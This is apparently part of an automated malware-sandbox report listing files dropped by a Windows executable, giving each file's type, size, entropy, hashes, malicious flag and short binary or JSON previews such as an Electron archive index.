                                                                                                                                                                                            SSDEEP:6144:mHM4QhMCJi4wNNBXBLGfs9y+z5GHNXun0msRgMpI2:CchHi4wD50XosR9pN
                                                                                                                                                                                            MD5:B1AB7D7AA67A7B61BFA9AEBAD0B812AF
                                                                                                                                                                                            SHA1:95EFF4BE517C0A25C34578DEF10D48C77021DE1A
                                                                                                                                                                                            SHA-256:5BD503C413AAF8FA87FD47C341D437ACCC25397A50B082068BCF2F3BB4FB27C7
                                                                                                                                                                                            SHA-512:8498FE7727771DF3C1EB34560C1E25B0C30690C7C921104B4ADCF04CC5753462BAC513A60A5833CB6F57733201D4883605F8A4EC4A457F3EBC7C952090B1A9E1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):585544
                                                                                                                                                                                            Entropy (8bit):5.398721361990628
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:EdZCITRW+kQdJs7ieJVJJxhbHMm5wfBCV5z6jPdoSR7oF:6XJksvMV5+jPSSR7Y
                                                                                                                                                                                            MD5:CBE5E35F844F5F1400DF3685CC847694
                                                                                                                                                                                            SHA1:E60CDB0A813A97C8548C878276BFAE155350BB42
                                                                                                                                                                                            SHA-256:6B9BD714D217D596183894FFED3174A617E1C8CFAE292231D4B967183B589C6B
                                                                                                                                                                                            SHA-512:96046C97436A3DBF5AAC479B9EAA9DFDCFC81F1EDCAEE9CD65D59BEB0CE6B6B42828E0D170AAEF2EF1D68988F7916AC1DBAC0D84218DE83FEDCCA8592DE4C1F1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):606335
                                                                                                                                                                                            Entropy (8bit):5.4540537912984615
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:kxrPkiHXWrfGENd49ow6q0gdKXKkQGXq5e3jUZGs2hj/Xrbf:CrxXWr3Nu9o7qHKasq5ezUuj/3f
                                                                                                                                                                                            MD5:5DB10EDF772656C0808DD8DA698334BF
                                                                                                                                                                                            SHA1:3CAF7C9D5A3B44E06E0588DABA698B6970EA06F5
                                                                                                                                                                                            SHA-256:73B6A63352906D77196F38A1DF937EC0770160FB7A93321867C7994ED3E7967B
                                                                                                                                                                                            SHA-512:EB253B548C7F574943136764A23818F9DEDEA17FF42F92DC8591F4B7C297ACCDDE9F6B2C0AD96F1FD0815C53940C0102A90C603F9F4D6D9C8FB053B559CC7A62
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):996315
                                                                                                                                                                                            Entropy (8bit):4.845331047532895
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:4I6pfQjRo4YSWPAY+zJ9LF1WAati/16HzW/yqSvDsNL4kXew+YHVeXN2hVO3j/iH:4T25H3Oc
                                                                                                                                                                                            MD5:E9AF20A6226511CD535888846A2BB16F
                                                                                                                                                                                            SHA1:739A46269F334ECC291BAE6777F0B7C8E271E4C0
                                                                                                                                                                                            SHA-256:5DB640C6C288D9FC79012A7670301A3BC463359C17BA200AEDAA56260EF8D955
                                                                                                                                                                                            SHA-512:7897C500718382F08D55F3CDDD96D1451524B5C2B8FEBC65E1700A645598B622C819EC66E4A21C119F044FAAA525A2ABDDDF66D0C9800AF6ECEA9CEB217A88BB
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):626605
                                                                                                                                                                                            Entropy (8bit):5.815043408006658
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:6fKTvoktDh40i/igVQm5611wYZLtWTjsxt9Wl:6KTdjib5ewsPtIl
                                                                                                                                                                                            MD5:B0BBB6661370D27B6600EBE98CADB9AC
                                                                                                                                                                                            SHA1:1139852DA47048F15C16EB101DAC86DFC8F652BA
                                                                                                                                                                                            SHA-256:E0FE4130E668AC659D5334C5BC8CDE70BBA8742273B5965836860B5A8B1B016A
                                                                                                                                                                                            SHA-512:C8EAC323552F873EC088F77B8C46522387B0298B6D566CF8AA173FA9B2D66389068BB26E46044AF2FAA4224B39DC748164843B58B99E9DDE093FCB32AFB5FED0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):601837
                                                                                                                                                                                            Entropy (8bit):5.489524001909229
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:mZ9VfcB2z/i1SE5vqfCWJU171i/fzSjqc:mHVBWSE5vqfmi/fzSl
                                                                                                                                                                                            MD5:AA7C0F35B61A230D65E498DAAB67388C
                                                                                                                                                                                            SHA1:F60CB1C7128A1FB1CFD9AA029F96DF36033777D0
                                                                                                                                                                                            SHA-256:03AFC83CDBA98C08AF169C8AE111AA916F3EE6D5A2FEE4954EF35ECC063F2B21
                                                                                                                                                                                            SHA-512:048D03C490F18D22F4900363F9C4ABEE037A2029F226C90806064FFEDC85B07A1D86225B9C534311B08F588632A84221D7E4FA355E7B768CFDFD6102C5FFE705
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):924863
                                                                                                                                                                                            Entropy (8bit):4.7696519516761695
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:nP3ydDCzsexx7UinNLQIlApSld7vwFi4CBaAwH5YvTEquCxa4F37nyIzy/k/S:P3G2zBTfWt5suBr
                                                                                                                                                                                            MD5:ABDD9EB966D915C1896B31CBA0B2656B
                                                                                                                                                                                            SHA1:CB0080E5F2C168CD0F3EDC6ED6C47734FFD67790
                                                                                                                                                                                            SHA-256:3913D3BE5016CE873AC68AF376D5FCF558BB5F5F29A9BC56DF0099BA47E52486
                                                                                                                                                                                            SHA-512:BCB258D6DA766BB6F00DFDBB03BC878000D9CF28B2B707375CE52485DB9C530A34D1528A1473F09B5765BC57ABD847F191BDE55646EB707443CD0E40509B70E1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):541025
                                                                                                                                                                                            Entropy (8bit):5.5401177610527155
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:MnZyPzw0uHrwiTR91Q0Z4IoogVChcxorsl6hI+vRFcz5RtGl2KYF4bkvMrOSOgfm:i8U7DTC0Z4KhJW5krMTMo
                                                                                                                                                                                            MD5:CC0806219798E3ADE0437219457A37AB
                                                                                                                                                                                            SHA1:DD6BA47E14B7B0D08159FBCA2409B013DC2E17DE
                                                                                                                                                                                            SHA-256:79A7260C8651FF3024E21F9263543BF4E9D5F3574E81CF96EDF6388F8DA85CD1
                                                                                                                                                                                            SHA-512:DF3DA02BB2FECBBAF1AB80AF8EF8B1A7AE9F6C7ED01F94C5A502720376924132C344DD716FC5B4DDC03733A6C3581ED8D8A577154C619BA85C527DC67F4A48C2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):570564
                                                                                                                                                                                            Entropy (8bit):5.341574755821131
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:Evzozr9Cpdjcu25KmedqrCBfRdpG5PbQW49qx2FRyl+Y4jNUkCarOg6jP5AuNskZ:Evk3v15zsI
                                                                                                                                                                                            MD5:A63EF2C4676DFBEE98E29A84A7AD9D27
                                                                                                                                                                                            SHA1:2F0F4B33ACF5E63F3159C62C74DEAA9A361203F4
                                                                                                                                                                                            SHA-256:7B8C51B247DEA72D68CB0EF4292800C13209DA6F859A9AD289C996582F19E65C
                                                                                                                                                                                            SHA-512:CD65FD2C49D35757DE648F21DEC748FB4A1D13D2308552774FE9C859AD5748B21F5DB449F8B380520F27DC868A3EBAAFD58D4C45ABA34033785777D342E17E6F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1468553
                                                                                                                                                                                            Entropy (8bit):4.052663401346278
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:eO7hLhGq5MLs32+5CrVKa1i55G62sRtRdutm1vYpiMy+:rdLhGoC+sBD1i554sRtRdutm1vYpiMy+
                                                                                                                                                                                            MD5:AA06EAD1200F01C9460399F0ABE2D54F
                                                                                                                                                                                            SHA1:9B852C4691209C0AE9EDF94A5DEC4B902FEC7B3E
                                                                                                                                                                                            SHA-256:1946D903918C57836D2F898EF93CD1D575DA1A464E358C399DFDE73EA2EF057E
                                                                                                                                                                                            SHA-512:6E556B962C16AEE22695D93B62B308D95B0695873FB33D13A147B3D8B6791C9599DAA6E3BF424A1897212A018AB36DD8C8214C2EB03457048C6931686BE40E04
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1359248
                                                                                                                                                                                            Entropy (8bit):4.307321925100967
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:RG0y8Y7McKNW0yR5D7FgpC8ybtKRT5sbvkW3p/8WffhBp3p1FPnzTitlF2iDk7Pi:RGB+s5RNHFy
                                                                                                                                                                                            MD5:A4ACCC25DD8A00BC57DF4FCA12E41295
                                                                                                                                                                                            SHA1:9466888034C9E6ECF4113DDDA63D363ED20E3156
                                                                                                                                                                                            SHA-256:157D646525F6A9AC267466631671E65E9B5C3E55B008B564186E64C6853E52AA
                                                                                                                                                                                            SHA-512:F19116655B6C2BB5C572B45F1D712FA1F9D57D9E8963FB3D654ED3781BD34A4E937B590BCC1119A318E28632DA12A0EF8B36F6426791DE833898CF7F30189567
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1142703
                                                                                                                                                                                            Entropy (8bit):4.350453098899463
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:X6cnN9LyZYAPTKznL/4svUSynUGevuB5Uz0dNL3fRj8NRU+wunRUdGILV+w11LAn:X05ANf
                                                                                                                                                                                            MD5:B18E4574DB917920ECCFB8E6900D0662
                                                                                                                                                                                            SHA1:554206B9E639135074B0946FB28B6FFE2D934159
                                                                                                                                                                                            SHA-256:C14FA1BB30C880216D6CFEA6FB738235CF72A3FE8BE919C3D61321D5A5883211
                                                                                                                                                                                            SHA-512:5F427F9ED85BB368B45BAFD523C634E18596E430FDC380563878D2CA897CF2580D0405F7C0D8E10ABBA389BB7125978A81D335263BB777E0EE0BFE3D47C8C65F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):581275
                                                                                                                                                                                            Entropy (8bit):5.614415854351588
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:A9dM9N/9/UHzNsgkDQqZFtQSJ8kJ5MLJy:0eZb8kJ50Jy
                                                                                                                                                                                            MD5:82C6A14BA1B28F947BEE67BC3FEAB091
                                                                                                                                                                                            SHA1:25023B22EAED29D0817EC95D5BCB4AD3D724F5AD
                                                                                                                                                                                            SHA-256:099507F6F2A2C98ECCE275F8AD956EEEEAADA65B7788356301AF04A0CD7D431E
                                                                                                                                                                                            SHA-512:988A9275B7A05D100CA9242DD05969D2363A42938D47DB37A1F62EC1874E96B640C14B272F1829AB5C6E0D2763C22FBF0AF99894D4D9D32726925EABBC02C05E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):996487
                                                                                                                                                                                            Entropy (8bit):4.873979205850633
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:1x/vKIH9mGGHWK9TddsSr+whF5gZrZEdIIXgOb5YB3Ijwl2Ab+rUcauHLNiXErqx:3/vXH9ynh5BrI
                                                                                                                                                                                            MD5:EC3AA18A9D9C989B1025DDDB0FA52B55
                                                                                                                                                                                            SHA1:AB3B0834CABEE34BC2F9FD04104B10E5F9C102CA
                                                                                                                                                                                            SHA-256:EE67744C26E0C69FBED8B102ADD339070AABC70C2D8CA9EA037C6C9D23B66D3B
                                                                                                                                                                                            SHA-512:90D40424B050C6C7ACE113E85B0B0A58472967C50A14FBC6637CD3B2DB8FF3F521CC94DCD256FA017684256E8A9C19B158AAA57F6D3094FAB970578D3B1C6847
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):870809
                                                                                                                                                                                            Entropy (8bit):5.161712117251234
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:wtiyilnG/Uo458PMzCR4FXdQLN9AyTibR45GO6EhTCWORJlbQYrMYVwadcJKwURn:Vyie5T5/Cgu
                                                                                                                                                                                            MD5:CB228CC41981E8BCBD2768DA20026912
                                                                                                                                                                                            SHA1:C55BB999C4C1FBEE5E38B6C986FBCE2B128F3880
                                                                                                                                                                                            SHA-256:A7D825FE348700528800EF9EA7940EE8027373E9C05A4E51E526D0A213C05429
                                                                                                                                                                                            SHA-512:85308806BE53494683F32520E181DD9C8C9ABAC0B92BC439D4E30EEF22D4AF993794A9719DD9A4EEED0BBCAF61C0E2342E7D4ED5D30B504572BD2BC269100E2E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):689415
                                                                                                                                                                                            Entropy (8bit):5.7905904014606335
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:v8/9MO+cGZoEK9VaZLlFK0FgxBxJbTsIxvx5a8h/9cDNUOnmzi0HRva8Z1lc:vSSO+cG6V4lE0uxHZH5a899yiOnwi01k
                                                                                                                                                                                            MD5:045241A62232BAE57F1D57C6C3AF7C55
                                                                                                                                                                                            SHA1:5C2A1A677A8BDFA20F3577335131BD4B89A46355
                                                                                                                                                                                            SHA-256:56758C918BBFE6A9D5B20E8B4A7248BDF2D43E0BF5F98E85A9892FF03DBC2D99
                                                                                                                                                                                            SHA-512:8E30AF44A53A36A194DA16A756DFF0F90EFBEF164277BDCDE683C89A3CDC04AE5E1298475E8A098D19DAB73EB0A71637F676D49D237C5480E1F7ACA1765166BB
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):496499
                                                                                                                                                                                            Entropy (8bit):6.685741162993645
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:rr0PPN0s9IHFKwowzwAEM7i56Ez2bHy1t59Lo3/4oT2Paq8lc:XGNXUKwTzwx956Ez2bH05Nov4oTUV
                                                                                                                                                                                            MD5:798BC7D8B63906C5B1C67E89AD17DC58
                                                                                                                                                                                            SHA1:B39C86D6D3FD9D8B8DA90D86F827A0C0803FBA8C
                                                                                                                                                                                            SHA-256:1C05280D8DCDFE99619695B76DD054292A90C1A93A5CFB92CDC4A5B0068A7092
                                                                                                                                                                                            SHA-512:7A21AF438823D562B889D7C99F639421E01F0536E95F3206DD53D2C8DED82B7A4AB74BB9B4262B2FA27E50EFD8DD7719827AD2E6B6D4C2E0D0811930027ED982
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):491017
                                                                                                                                                                                            Entropy (8bit):6.696102855635661
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:IpP3caOCTyemy5JPFW2uHu4u0JU52UznMi4LnKeze9Tk:qXvmOWzu0JU52UznUeC
                                                                                                                                                                                            MD5:0BE25A48EECEE48F428FE56FBFA683FD
                                                                                                                                                                                            SHA1:94C0E8C99BEB592EBAB9EA5B8758AA414BBE7048
                                                                                                                                                                                            SHA-256:A5E276BDFE4CF87832EEE153596CCDE9CF9193E81F29A4295C8335525DA64295
                                                                                                                                                                                            SHA-512:423033E67654820AB9F9773F45F70908511AEB8228C59126757885E0BBE0BD960257324D405D27526D61B541B1E6323DE16BEF29D4DCB94F39FD5E92FA811CC8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5755390
                                                                                                                                                                                            Entropy (8bit):7.996220000544904
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:98304:JZ5ti6+nkrht455GGPeenn0mJSwLEpxIvMi8rwrGU3nAaqdkmYAzFKwR4:j7ilnkrP455GGHnhEXU8kr1Xqdf1FvG
                                                                                                                                                                                            MD5:6772B597BF68622D934F207570E771B1
                                                                                                                                                                                            SHA1:F2A80FBFA034CB1FA07DC9AA37BF9F5B2280FF13
                                                                                                                                                                                            SHA-256:268DE4D99AB7C4F4EE32C8E8CB2B058A2C8D0D839F468AE8E8C0605FEAA736EA
                                                                                                                                                                                            SHA-512:A2BE67DF09951C9EF9200DCCCBDFF13736921522191F0001DA539D5C7F26B5B26A6B810BE6963908F216768C98D21E52486C7E00538CC0730E8C78E78811B85B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):11404197
                                                                                                                                                                                            Entropy (8bit):6.454983757670651
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:7M8gj5wrFTmZcpzeLWz8TSfmxfv05Qvl9Hu1fBWfzbnWw+uH20Nmq:7q5wrFTmZcp6xSkFleWfzbWwu0Nm
                                                                                                                                                                                            MD5:32DA5BCDA2877B98357BABD2E841822D
                                                                                                                                                                                            SHA1:8DFB2C1A358E737BDAC4FC3C19FA5B1B3C8629C8
                                                                                                                                                                                            SHA-256:7C05878E83FAEDEF9A95156D12D674F7B69DA8F9CC45CEA1C68C1698ACF1FA38
                                                                                                                                                                                            SHA-512:B7D62EC67257832D7E4C18339AEBED9C0432CD1D9307EB020146195263645F1CDE60FF83E55BE5414A7189F9ECD51E52A5EB2F17B4B467539A1B1EF62AC50D05
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:....4+..0+..++..{"files":{"node_modules":{"files":{"@babel":{"files":{"generator":{"files":{"LICENSE":{"size":1106,"integrity":{"algorithm":"SHA256","hash":"117da2af0d4ce0fe1c8e19b5cff9dcd806adf973d328d27b11d4448c4ff24f76","blockSize":4194304,"blocks":["117da2af0d4ce0fe1c8e19b5cff9dcd806adf973d328d27b11d4448c4ff24f76"]},"offset":"0"},"lib":{"files":{"buffer.js":{"size":5771,"integrity":{"algorithm":"SHA256","hash":"49d70448373ee7293d57c661383f44e86174059be60d2f8fb98969ae97f16e5e","blockSize":4194304,"blocks":["49d70448373ee7293d57c661383f44e86174059be60d2f8fb98969ae97f16e5e"]},"offset":"1106"},"generators":{"files":{"base.js":{"size":2294,"integrity":{"algorithm":"SHA256","hash":"fb4891bbcaf0f27846b193500bc944213e7cbf2c0feb282795b153d70282e000","blockSize":4194304,"blocks":["fb4891bbcaf0f27846b193500bc944213e7cbf2c0feb282795b153d70282e000"]},"offset":"6877"},"classes.js":{"size":4157,"integrity":{"algorithm":"SHA256","hash":"7f9a3208c888e8ef986bf7cb79a5143fd8bb51308ca17bad9e0a5be0c5251
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):107520
                                                                                                                                                                                            Entropy (8bit):6.442687067441468
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:1bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWl:1PrwRhte1XsE1l
                                                                                                                                                                                            MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                                                                                                                                            SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                                                                                                                                            SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                                                                                                                                            SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):316538
                                                                                                                                                                                            Entropy (8bit):4.177181507694743
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:p+JfFRciefJNlUMX2kIE1aOaVsS/3hYeFWYSITdJgClE+ceNTbM:pefPciePmMXh1aOCsy3hpFRlzVw
                                                                                                                                                                                            MD5:C8950B01F336B05609976546B1A007E6
                                                                                                                                                                                            SHA1:F04D0B0369007BBE6A7FE129B31B19DD1822F32F
                                                                                                                                                                                            SHA-256:9B3A75A713E41BC73F219858FCAC8E3031BA22732285ED3A64DC48074C725CC2
                                                                                                                                                                                            SHA-512:B7DB4277290E849A52AD5D31FF65AB5D2B75C2125D67EEEE02B09E4E7001AA46D10BF89429C65695C7560D1C45B898C20275EB9E36CD8B259707FFB8B298F103
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..........(.._.13.0.245.16-electron.0..........................................`L..............l....K..}.a........a........a2.......aj.......ad.......a<....................r........2.............R..............r........2...(Jb...-Q.....@...^.M..Q.`.....(Jb...1U.....@...^..`.....H...IDa........Db............D`.....I.D`......]D....Da..........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.....................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):687473
                                                                                                                                                                                            Entropy (8bit):5.155441647860749
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:vPYRCOn2E6keR1PciePmMXh1aOCsy3hbHRlEDMrVkSiF01gwoHZHCvqmO9iXz8pk:vPY5nnbe3WZBr/iXo73nVE+2l
                                                                                                                                                                                            MD5:BF2976DA5086B48D74EB36F56F5DEB83
                                                                                                                                                                                            SHA1:5AA7669A3E2166FDD7534241A0E7A9BD3FF5748B
                                                                                                                                                                                            SHA-256:9F1614328E18BECB4ADF96DE98BC91CE2A69274ABE6621327CC0FC8503A1AB20
                                                                                                                                                                                            SHA-512:C44DEEB96597B4498604ECF2060EE0520E84A00308CA1F47FFDF8E3ED3E676B27B622FF7DBD4B6F1A14CE60B05CC2AD9B8D7562BB362C1B12A885EA7FBE50E0A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:...........a.na.13.0.245.16-electron.0..............................................!...i...1...q.......l...x...}.a........a........a........aj.......ad.......a<....................r........2.............R..............r........2...(Jb...-Q.....@...^.M..Q.`.....(Jb...1U.....@...^..`.....H...IDa........Db............D`.....I.D`......]D....Da..........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5533184
                                                                                                                                                                                            Entropy (8bit):6.341413194477468
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:zBVtMrKyOsxYYAKDsJS86IxORjgUlC3K/FAz4gdm6o4oX7uh5LC6MW4LY67h772c:jWKyOEnOnoLrWbfDiN9isC
                                                                                                                                                                                            MD5:6720D5DCDA6737EB0CC5A352A47414DC
                                                                                                                                                                                            SHA1:03D9A8E350F485DD955F7DEE06BFC46371753032
                                                                                                                                                                                            SHA-256:D8F36B089D83157ABC271D9FE125919C3237943FA9789A511AC5EF1D41E2E3AF
                                                                                                                                                                                            SHA-512:DE5ADE6CE14B14957FCE669C4181AF1E6A6F540798D1C6720B56FF281F813A6CE4446BDE33A8F175D2484E07F4911F93A773CAC1D372CBE3B26BE634B3FA1686
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):106
                                                                                                                                                                                            Entropy (8bit):4.724752649036734
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                                                                                                                            MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                                            SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                                            SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                                            SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):894976
                                                                                                                                                                                            Entropy (8bit):6.60309283089771
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:FhJnfYUcguY3cTAL6Z5WjDYsHy6g3P0zAk7TNb:FhVrXN3oAL6Z5WjDYsHy6g3P0zAk7T
                                                                                                                                                                                            MD5:B6D3AF84E8BE0027741AA6077768789E
                                                                                                                                                                                            SHA1:E525F2434DC56F79644695F5841E91DD5F80EEC4
                                                                                                                                                                                            SHA-256:376FF6892EC7B406ACD8C455AC82F8541E59E3757195488FF04CD9F20D554562
                                                                                                                                                                                            SHA-512:F03B8792A740679C8A1A8CE0615B7876CC811130085F3FFB42182E0CB846519603804DA97FC93A8ABEBEE01E03FD257DF289C54575DA8FAAAD018F4F4BAE606A
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9216
                                                                                                                                                                                            Entropy (8bit):5.5347224014600345
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:5lkE3uqRI1y7/xcfK4PRef6gQzJyY1rpKlVrw:5lkMBI1y7UKcef6XzJrpKY
